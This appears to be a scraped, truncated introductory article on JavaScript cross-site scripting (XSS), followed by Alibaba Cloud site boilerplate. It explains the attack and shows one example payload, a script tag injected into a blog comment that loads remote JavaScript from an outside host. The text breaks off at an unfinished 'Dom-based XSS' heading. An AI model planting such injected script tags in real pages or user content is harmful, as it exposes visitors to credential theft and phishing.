JavaScript Cross-Site scripting attacks

Source: Internet
Author: User

The cross-site scripting Attack (Cross-site scrpting), referred to as XSS, refers to injecting a script into the DOM of pages in other domains that are visible to other users. A malicious user may attempt to exploit this vulnerability to record a user's keystrokes or actions to steal certain information from the user. In the past, sites that contained user submissions were particularly vulnerable to this vulnerability. For example, a user submits a comment in a blog and contains a script block that resembles the following code:

 for Post that ... <script type= "Text/javascript" src= "Http://abc.org/aa.js" ></script>

When you browse the page, only comments are visible, but for each user who accesses the page, the browser downloads an external script for that user. In this external script you can spy on the user's login information or other screen content, or even rewrite the DOM to achieve phishing attempts.

  • Dom-based XSS
    • For

JavaScript Cross-Site scripting attacks

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.